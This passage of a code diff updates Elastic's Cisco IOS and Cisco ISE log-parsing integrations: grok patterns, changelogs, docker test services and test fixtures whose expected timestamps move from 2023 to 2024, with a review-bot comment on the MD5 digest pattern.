@@ -162,10 +138,10 @@ processors: ignore_missing: true if: ctx.cisco?.ios?.facility == 'FW' && ctx.event?.code == 'DROP_PKT' - rename: - field: ntp_message + field: _temp_.generic_message target_field: message - tag: rename_ntp_message - if: ctx.ntp_message != null + tag: rename_generic_message + if: ctx._temp_?.generic_message != null - convert: field: event.severity type: long @@ -215,7 +191,7 @@ processors: field: message tag: grok_badauth patterns: - - '^No MD5 digest from %{DATA:source.address}(\(%{INT:source.port}\)|\:%{INT:source.port}) to %{DATA:destination.address}(\(%{INT:destination.port}\)|\:%{INT:destination.port})(?: \(RST\) ((tableid - %{DATA:cisco.ios.tableid})|(%{GREEDYDATA:_temp_.rst})))?$' + - '^(?:No|Invalid) MD5 digest from %{DATA:source.address}(\(%{INT:source.port}\)|\:%{INT:source.port}) to %{DATA:destination.address}(\(%{INT:destination.port}\)|\:%{INT:destination.port})(?:(?: \(RST\))? (?:tableid - %{DATA:cisco.ios.tableid}|%{GREEDYDATA:_temp_.rst}))?$' ignore_missing: true if: ctx.event?.code == 'BADAUTH' - grok: diff --git a/packages/cisco_ios/docs/README.md b/packages/cisco_ios/docs/README.md index 29aac1cc702..40e9a7a6b32 100644 --- a/packages/cisco_ios/docs/README.md +++ b/packages/cisco_ios/docs/README.md 
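Review bot: The badauth pattern now accepts both `No MD5 digest` and `Invalid MD5 digest` but discards which one it saw, although they mean different things to an operator: a missing digest is a peer that is not sending TCP MD5 at all, an invalid one is typically a key mismatch, and the new expected documents for the `Invalid` lines carry only `event.category: network` and `event.type: info` with nothing recording the reason. Capturing the verb, e.g. `^(?<cisco.ios.badauth_reason>No|Invalid) MD5 digest from ...`, would let a detection separate the two, though the field would have to be declared in the data stream's field definitions, which are outside this hunk. The trailing `(?:tableid - %{DATA:cisco.ios.tableid}|%{GREEDYDATA:_temp_.rst})` alternative still swallows any unrecognised suffix into a temp field, so a new message variant will quietly lose its tail rather than fail; a comment stating that `_temp_.rst` is a deliberate catch-all (presumably dropped with the other `_temp_` fields later) would help the next reader. The processor's opening `- grok:` line sits just above the hunk.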
@@ -15,6 +15,7 @@ The format of timezones added to Cisco IOS logs does not always match the expect 2. `Timezone Map` - This option is for users who have logs from multiple timezones and want to translate them to the correct timezone. This option allows the user to specify a map of timezones to translate from and to. This option is recommended for advanced users who have logs from multiple timezones being sent to the same integration instance. If the timezone in a Cisco IOS log entry does not match any of the configured mappings, the log will fall back to the timezone specified in the `Timezone` option, and also defaults to `UTC`. +If log messages are relayed resulting in additional syslog header prefixes or other text, this text must be removed for ingestion to be successful. This may be done by adding an appropriate Beats processor to the configuration. ### IOS diff --git a/packages/cisco_ios/manifest.yml b/packages/cisco_ios/manifest.yml index 9d211e82a02..49379e44dce 100644 --- a/packages/cisco_ios/manifest.yml +++ b/packages/cisco_ios/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_ios title: Cisco IOS -version: "1.24.1" +version: "1.26.5" description: Collect logs from Cisco IOS with Elastic Agent. type: integration categories: diff --git a/packages/cisco_ise/_dev/deploy/docker/docker-compose.yml b/packages/cisco_ise/_dev/deploy/docker/docker-compose.yml index a6aa39d0b79..07eb145dbe2 100644 --- a/packages/cisco_ise/_dev/deploy/docker/docker-compose.yml +++ b/packages/cisco_ise/_dev/deploy/docker/docker-compose.yml 
@@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" cisco_ise-log-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9025 -p=tcp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9025 -p=tcp /sample_logs/log.log cisco_ise-log-udp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9026 -p=udp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9026 -p=udp /sample_logs/log.log diff --git a/packages/cisco_ise/changelog.yml b/packages/cisco_ise/changelog.yml index c7638922fd6..8c7763bfe19 100644 --- a/packages/cisco_ise/changelog.yml +++ b/packages/cisco_ise/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.22.1" + changes: + - description: Make Cisco ISE syslog priority field optional + type: enhancement + link: https://github.com/elastic/integrations/pull/9533 +- version: "1.22.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "1.21.4" + changes: + - description: Remove duplicate 'event.code' 60077 from list for category mapping. + type: bugfix + link: https://github.com/elastic/integrations/pull/9165 - version: "1.21.3" changes: - description: Fix ingest pipeline conditional field handling. 
diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-ad-connector.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-ad-connector.log-expected.json index 50dd6610ac2..f6b9f8dcb66 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-ad-connector.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-ad-connector.log-expected.json @@ -755,7 +755,7 @@ ] }, { - "@timestamp": "2023-03-03T10:42:25.000Z", + "@timestamp": "2024-03-03T10:42:25.000Z", "cisco_ise": { "log": { "ad": { @@ -804,7 +804,7 @@ ] }, { - "@timestamp": "2023-03-03T10:42:25.000+02:00", + "@timestamp": "2024-03-03T10:42:25.000+02:00", "cisco_ise": { "log": { "ad": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-administrative-and-operational-audit.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-administrative-and-operational-audit.log-expected.json index ba50d468d31..74a7a9157a1 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-administrative-and-operational-audit.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-administrative-and-operational-audit.log-expected.json @@ -2247,7 +2247,7 @@ ] }, { - "@timestamp": "2023-03-15T08:30:16.000Z", + "@timestamp": "2024-03-15T08:30:16.000Z", "cisco_ise": { "log": { "admin": { @@ -2306,7 +2306,7 @@ ] }, { - "@timestamp": "2023-03-15T09:34:39.000Z", + "@timestamp": "2024-03-15T09:34:39.000Z", "cisco_ise": { "log": { "admin": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-authentication-flow-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-authentication-flow-diagnostics.log-expected.json index fa0189f8de5..6a44d991278 100644 
--- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-authentication-flow-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-authentication-flow-diagnostics.log-expected.json @@ -962,7 +962,7 @@ } }, { - "@timestamp": "2023-03-28T11:23:25.000Z", + "@timestamp": "2024-03-28T11:23:25.000Z", "cisco_ise": { "log": { "acs": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-cise-alarm.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-cise-alarm.log-expected.json index 92d76d7ed45..487b3adb08b 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-cise-alarm.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-cise-alarm.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-09-26T02:17:37.000Z", + "@timestamp": "2024-09-26T02:17:37.000Z", "cisco_ise": { "log": { "category": { @@ -46,7 +46,7 @@ ] }, { - "@timestamp": "2023-09-24T16:05:07.000Z", + "@timestamp": "2024-09-24T16:05:07.000Z", "cisco_ise": { "log": { "category": { @@ -91,7 +91,7 @@ ] }, { - "@timestamp": "2023-09-24T16:05:07.000Z", + "@timestamp": "2024-09-24T16:05:07.000Z", "cisco_ise": { "log": { "category": { @@ -135,7 +135,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:17.000Z", + "@timestamp": "2024-09-26T02:17:17.000Z", "cisco_ise": { "log": { "category": { @@ -179,7 +179,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:17.000Z", + "@timestamp": "2024-09-26T02:17:17.000Z", "cisco_ise": { "log": { "category": { @@ -223,7 +223,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:17.000Z", + "@timestamp": "2024-09-26T02:17:17.000Z", "cisco_ise": { "log": { "category": { @@ -267,7 +267,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:07.000Z", + "@timestamp": "2024-09-26T02:17:07.000Z", "cisco_ise": { "log": { "category": { 
@@ -312,7 +312,7 @@ ] }, { - "@timestamp": "2023-09-26T02:17:07.000Z", + "@timestamp": "2024-09-26T02:17:07.000Z", "cisco_ise": { "log": { "category": { @@ -356,7 +356,7 @@ ] }, { - "@timestamp": "2023-09-24T16:04:27.000Z", + "@timestamp": "2024-09-24T16:04:27.000Z", "cisco_ise": { "log": { "category": { @@ -401,7 +401,7 @@ ] }, { - "@timestamp": "2023-09-26T02:16:17.000Z", + "@timestamp": "2024-09-26T02:16:17.000Z", "cisco_ise": { "log": { "category": { @@ -445,7 +445,7 @@ ] }, { - "@timestamp": "2023-09-26T02:16:17.000Z", + "@timestamp": "2024-09-26T02:16:17.000Z", "cisco_ise": { "log": { "category": { @@ -489,7 +489,7 @@ ] }, { - "@timestamp": "2023-09-24T16:03:57.000Z", + "@timestamp": "2024-09-24T16:03:57.000Z", "cisco_ise": { "log": { "category": { @@ -533,7 +533,7 @@ ] }, { - "@timestamp": "2023-09-24T16:03:47.000Z", + "@timestamp": "2024-09-24T16:03:47.000Z", "cisco_ise": { "log": { "category": { @@ -578,7 +578,7 @@ ] }, { - "@timestamp": "2023-09-24T16:03:47.000Z", + "@timestamp": "2024-09-24T16:03:47.000Z", "cisco_ise": { "log": { "category": { @@ -622,7 +622,7 @@ ] }, { - "@timestamp": "2023-09-26T07:22:57.000Z", + "@timestamp": "2024-09-26T07:22:57.000Z", "cisco_ise": { "log": { "calling_station_id": "AA-FF-FF-FE-4E-EE", @@ -672,7 +672,7 @@ ] }, { - "@timestamp": "2023-09-26T07:22:57.000Z", + "@timestamp": "2024-09-26T07:22:57.000Z", "cisco_ise": { "log": { "calling_station_id": "AA-AA-6F-65-29-3A", @@ -722,7 +722,7 @@ ] }, { - "@timestamp": "2023-09-26T07:22:57.000Z", + "@timestamp": "2024-09-26T07:22:57.000Z", "cisco_ise": { "log": { "calling_station_id": "54-B2-AA-AA-AA-88", @@ -772,7 +772,7 @@ ] }, { - "@timestamp": "2023-09-26T07:22:57.000Z", + "@timestamp": "2024-09-26T07:22:57.000Z", "cisco_ise": { "log": { "category": { @@ -817,7 +817,7 @@ ] }, { - "@timestamp": "2023-09-26T02:15:57.000Z", + "@timestamp": "2024-09-26T02:15:57.000Z", "cisco_ise": { "log": { "category": { 
@@ -861,7 +861,7 @@ ] }, { - "@timestamp": "2023-09-26T02:15:47.000Z", + "@timestamp": "2024-09-26T02:15:47.000Z", "cisco_ise": { "log": { "category": { @@ -905,7 +905,7 @@ ] }, { - "@timestamp": "2023-09-26T02:15:47.000Z", + "@timestamp": "2024-09-26T02:15:47.000Z", "cisco_ise": { "log": { "category": { @@ -949,7 +949,7 @@ ] }, { - "@timestamp": "2023-09-26T02:15:47.000Z", + "@timestamp": "2024-09-26T02:15:47.000Z", "cisco_ise": { "log": { "category": { @@ -994,7 +994,7 @@ ] }, { - "@timestamp": "2023-09-24T16:03:27.000Z", + "@timestamp": "2024-09-24T16:03:27.000Z", "cisco_ise": { "log": { "calling_station_id": "C0-25-AA-AA-AA-CA", diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-failed-attempts.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-failed-attempts.log-expected.json index dfcfd69cf54..67aa8e428d9 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-failed-attempts.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-failed-attempts.log-expected.json @@ -1164,7 +1164,7 @@ } }, { - "@timestamp": "2023-03-02T11:10:16.000Z", + "@timestamp": "2024-03-02T11:10:16.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-guest.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-guest.log-expected.json index 531d4b1b50c..ca149bc2263 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-guest.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-guest.log-expected.json @@ -186,7 +186,7 @@ } }, { - "@timestamp": "2023-03-28T11:46:05.000Z", + "@timestamp": "2024-03-28T11:46:05.000Z", "cisco_ise": { "log": { "authentication": { 
@@ -248,7 +248,7 @@ ] }, { - "@timestamp": "2023-03-28T15:59:33.000Z", + "@timestamp": "2024-03-28T15:59:33.000Z", "cisco_ise": { "log": { "category": { @@ -298,7 +298,7 @@ ] }, { - "@timestamp": "2023-03-28T16:00:31.000Z", + "@timestamp": "2024-03-28T16:00:31.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-identity-stores-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-identity-stores-diagnostics.log-expected.json index 248cd16e56c..7afb7e3da11 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-identity-stores-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-identity-stores-diagnostics.log-expected.json @@ -1304,7 +1304,7 @@ ] }, { - "@timestamp": "2023-03-28T11:23:25.000Z", + "@timestamp": "2024-03-28T11:23:25.000Z", "cisco_ise": { "log": { "acs": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-internal-operations-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-internal-operations-diagnostics.log-expected.json index 7e3f716d794..2e8ff23fa4d 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-internal-operations-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-internal-operations-diagnostics.log-expected.json @@ -325,7 +325,7 @@ ] }, { - "@timestamp": "2023-03-28T10:51:49.000Z", + "@timestamp": "2024-03-28T10:51:49.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log index 1faf1b85579..9f5f3e3ba21 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log 
+++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log 
@@ -2,3 +2,7 @@ <182>Mar 3 09:24:40 cisco-ise-host CISE_MyDevices 0000082656 1 0 2022-03-03 09:24:40.424 +00:00 0000082723 88010 INFO MyDevices: Successfully registered/provisioned the device (endpoint), ConfigVersionId=1628, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:01, EPIdentityGroup=RegisteredDevices, Staticassignment=true, EndPointProfiler=ise.host.local, EndPointPolicy=Unknown, DeviceName=test2, DeviceRegistrationStatus=Pending, ResponseTime=35 <179>Mar 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082659 1 0 2022-03-03 09:24:53.482 +00:00 0000082726 88013 ERROR MyDevices: Failed to perform a CoA termination, ConfigVersionId=1629, EPMacAddress=00:00:00:00:00:00, EndpointCoA=Terminate, <182>Mar 28 11:46:57 cisco-ise-host CISE_MyDevices 0000000231 4 1 AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=Any, PsnHostName=cisco-ise-host.host.local, EPMacAddress=12:34:52:24:24:32, +Apr 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082658 1 0 2022-03-03 09:24:53.393 +00:00 0000082725 88004 INFO MyDevices: Successfully deleted the device (endpoint), ConfigVersionId=1629, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:00, EPIdentityGroup=Unknown, Staticassignment=false, EndPointProfiler=ise.host.local, EndPointPolicy=Xerox-Device, DeviceName=test, DeviceRegistrationStatus=NotRegistered, ResponseTime=35, +Apr 3 09:24:40 cisco-ise-host CISE_MyDevices 0000082656 1 0 2022-03-03 09:24:40.424 +00:00 0000082723 88010 INFO MyDevices: Successfully registered/provisioned the device (endpoint), ConfigVersionId=1628, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, 
PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:01, EPIdentityGroup=RegisteredDevices, Staticassignment=true, EndPointProfiler=ise.host.local, EndPointPolicy=Unknown, DeviceName=test2, DeviceRegistrationStatus=Pending, ResponseTime=35 +Apr 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082659 1 0 2022-03-03 09:24:53.482 +00:00 0000082726 88013 ERROR MyDevices: Failed to perform a CoA termination, ConfigVersionId=1629, EPMacAddress=00:00:00:00:00:00, EndpointCoA=Terminate, +Apr 28 11:46:57 cisco-ise-host CISE_MyDevices 0000000231 4 1 AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=Any, PsnHostName=cisco-ise-host.host.local, EPMacAddress=12:34:52:24:24:32, diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log-expected.json index cdc2534848a..6a911a613de 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-my-devices.log-expected.json @@ -274,7 +274,7 @@ ] }, { - "@timestamp": "2023-03-28T11:46:57.000Z", + "@timestamp": "2024-03-28T11:46:57.000Z", "cisco_ise": { "log": { "authentication": { 
@@ -336,6 +336,335 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2022-03-03T09:24:53.393Z", + "cisco_ise": { + "log": { + "authentication": { + "identity_store": "Internal Users" + }, + "category": { + "name": "CISE_MyDevices" + }, + "config_version": { + "id": 1629 + }, + "device": { + "name": "test", + "registration_status": "NotRegistered" + }, + "endpoint": { + "policy": "Xerox-Device", + "profiler": "ise.host.local" + }, + "ep": { + "identity_group": "Unknown", + "mac": { + "address": "00:00:00:00:00:00" + } + }, + "identity": { + "group": "ALL_ACCOUNTS (default)" + }, + "message": { + "code": "88004", + "description": "MyDevices: Successfully deleted the device (endpoint)", + "id": "0000082658" + }, + "portal": { + "name": "My Devices Portal (default)" + }, + "psn": { + "hostname": "ise.host.local" + }, + "response": { + "time": 35 + }, + "segment": { + "number": 0, + "total": 1 + }, + "static": { + "assignment": false + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "mydevices", + "category": [ + "configuration" + ], + "code": "88004", + "kind": "event", + "original": "Apr 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082658 1 0 2022-03-03 09:24:53.393 +00:00 0000082725 88004 INFO MyDevices: Successfully deleted the device (endpoint), ConfigVersionId=1629, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:00, EPIdentityGroup=Unknown, Staticassignment=false, EndPointProfiler=ise.host.local, EndPointPolicy=Xerox-Device, DeviceName=test, DeviceRegistrationStatus=NotRegistered, ResponseTime=35,", + "sequence": 82725, + "timezone": "+00:00", + "type": [ + "info" + ] + }, + "host": { + "hostname": "cisco-ise-host" + }, + "log": { + "level": "info", + "syslog": { + "severity": { + "name": "info" + } + } + }, + "message": "2022-03-03 09:24:53.393 +00:00 
0000082725 88004 INFO MyDevices: Successfully deleted the device (endpoint), ConfigVersionId=1629, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:00, EPIdentityGroup=Unknown, Staticassignment=false, EndPointProfiler=ise.host.local, EndPointPolicy=Xerox-Device, DeviceName=test, DeviceRegistrationStatus=NotRegistered, ResponseTime=35,", + "related": { + "hosts": [ + "cisco-ise-host" + ], + "ip": [ + "81.2.69.144" + ], + "user": [ + "test" + ] + }, + "source": { + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "test" + } + }, + { + "@timestamp": "2022-03-03T09:24:40.424Z", + "cisco_ise": { + "log": { + "authentication": { + "identity_store": "Internal Users" + }, + "category": { + "name": "CISE_MyDevices" + }, + "config_version": { + "id": 1628 + }, + "device": { + "name": "test2", + "registration_status": "Pending" + }, + "endpoint": { + "policy": "Unknown", + "profiler": "ise.host.local" + }, + "ep": { + "identity_group": "RegisteredDevices", + "mac": { + "address": "00:00:00:00:00:01" + } + }, + "identity": { + "group": "ALL_ACCOUNTS (default)" + }, + "message": { + "code": "88010", + "description": "MyDevices: Successfully registered/provisioned the device (endpoint)", + "id": "0000082656" + }, + "portal": { + "name": "My Devices Portal (default)" + }, + "psn": { + "hostname": "ise.host.local" + }, + "segment": { + "number": 0, + "total": 1 + }, + "static": { + "assignment": true + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "mydevices", + "category": [ + "configuration" + ], + "code": "88010", + "kind": "event", + "original": "Apr 3 09:24:40 cisco-ise-host CISE_MyDevices 0000082656 1 0 2022-03-03 09:24:40.424 +00:00 0000082723 88010 INFO MyDevices: Successfully registered/provisioned the device (endpoint), 
ConfigVersionId=1628, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:01, EPIdentityGroup=RegisteredDevices, Staticassignment=true, EndPointProfiler=ise.host.local, EndPointPolicy=Unknown, DeviceName=test2, DeviceRegistrationStatus=Pending, ResponseTime=35", + "sequence": 82723, + "timezone": "+00:00", + "type": [ + "info" + ] + }, + "host": { + "hostname": "cisco-ise-host" + }, + "log": { + "level": "info", + "syslog": { + "severity": { + "name": "info" + } + } + }, + "message": "2022-03-03 09:24:40.424 +00:00 0000082723 88010 INFO MyDevices: Successfully registered/provisioned the device (endpoint), ConfigVersionId=1628, UserName=test, IpAddress=81.2.69.144, AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=ALL_ACCOUNTS (default), PsnHostName=ise.host.local, EPMacAddress=00:00:00:00:00:01, EPIdentityGroup=RegisteredDevices, Staticassignment=true, EndPointProfiler=ise.host.local, EndPointPolicy=Unknown, DeviceName=test2, DeviceRegistrationStatus=Pending, ResponseTime=35", + "related": { + "hosts": [ + "cisco-ise-host" + ], + "ip": [ + "81.2.69.144" + ], + "user": [ + "test" + ] + }, + "source": { + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "test" + } + }, + { + "@timestamp": "2022-03-03T09:24:53.482Z", + "cisco_ise": { + "log": { + "category": { + "name": "CISE_MyDevices" + }, + "config_version": { + "id": 1629 + }, + "endpoint": { + "coa": "Terminate" + }, + "ep": { + "mac": { + "address": "00:00:00:00:00:00" + } + }, + "message": { + "code": "88013", + "description": "MyDevices: Failed to perform a CoA termination", + "id": "0000082659" + }, + "segment": { + "number": 0, + "total": 1 + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "mydevices", + "category": [ + 
"configuration" + ], + "code": "88013", + "kind": "event", + "original": "Apr 3 09:24:53 cisco-ise-host CISE_MyDevices 0000082659 1 0 2022-03-03 09:24:53.482 +00:00 0000082726 88013 ERROR MyDevices: Failed to perform a CoA termination, ConfigVersionId=1629, EPMacAddress=00:00:00:00:00:00, EndpointCoA=Terminate,", + "sequence": 82726, + "timezone": "+00:00", + "type": [ + "info" + ] + }, + "host": { + "hostname": "cisco-ise-host" + }, + "log": { + "level": "error", + "syslog": { + "severity": { + "name": "error" + } + } + }, + "message": "2022-03-03 09:24:53.482 +00:00 0000082726 88013 ERROR MyDevices: Failed to perform a CoA termination, ConfigVersionId=1629, EPMacAddress=00:00:00:00:00:00, EndpointCoA=Terminate,", + "related": { + "hosts": [ + "cisco-ise-host" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-04-28T11:46:57.000Z", + "cisco_ise": { + "log": { + "authentication": { + "identity_store": "Internal Users" + }, + "category": { + "name": "CISE_MyDevices" + }, + "ep": { + "mac": { + "address": "12:34:52:24:24:32" + } + }, + "identity": { + "group": "Any" + }, + "message": { + "id": "0000000231" + }, + "portal": { + "name": "My Devices Portal (default)" + }, + "psn": { + "hostname": "cisco-ise-host.host.local" + }, + "segment": { + "number": 1, + "total": 4 + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "configuration" + ], + "kind": "event", + "original": "Apr 28 11:46:57 cisco-ise-host CISE_MyDevices 0000000231 4 1 AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=Any, PsnHostName=cisco-ise-host.host.local, EPMacAddress=12:34:52:24:24:32,", + "type": [ + "info" + ] + }, + "host": { + "hostname": "cisco-ise-host" + }, + "message": "AuthenticationIdentityStore=Internal Users, PortalName=My Devices Portal (default), IdentityGroup=Any, PsnHostName=cisco-ise-host.host.local, EPMacAddress=12:34:52:24:24:32,", + "related": { + "hosts": [ + 
"cisco-ise-host" + ] + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-passed-authentications.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-passed-authentications.log-expected.json index 55638100479..e287589ca4e 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-passed-authentications.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-passed-authentications.log-expected.json @@ -584,7 +584,7 @@ ] }, { - "@timestamp": "2023-03-03T09:11:58.000Z", + "@timestamp": "2024-03-03T09:11:58.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-policy-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-policy-diagnostics.log-expected.json index 09832249d8b..5cd9e6685a1 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-policy-diagnostics.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-policy-diagnostics.log-expected.json @@ -717,7 +717,7 @@ } }, { - "@timestamp": "2023-03-28T11:23:25.000Z", + "@timestamp": "2024-03-28T11:23:25.000Z", "cisco_ise": { "log": { "acs": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-posture-client-provisioning-audit.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-posture-client-provisioning-audit.log-expected.json index 2d94af4229f..942bd0f28c3 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-posture-client-provisioning-audit.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-posture-client-provisioning-audit.log-expected.json 
@@ -74,7 +74,7 @@ ] }, { - "@timestamp": "2023-02-26T22:15:22.000Z", + "@timestamp": "2024-02-26T22:15:22.000Z", "cisco_ise": { "log": { "category": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-accounting.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-accounting.log-expected.json index f8bd7c09c34..c34e495fa05 100644 --- a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-accounting.log-expected.json +++ b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-accounting.log-expected.json @@ -281,7 +281,7 @@ } }, { - "@timestamp": "2023-04-27T11:18:08.000Z", + "@timestamp": "2024-04-27T11:18:08.000Z", "cisco_ise": { "log": { "acct": { diff --git a/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-diagnostics.log-expected.json b/packages/cisco_ise/data_stream/log/_dev/test/pipeline/test-pipeline-radius-diagnostics.log-expected.json index 4e260ac21fa..02d0f8e9b5a 100644 --- 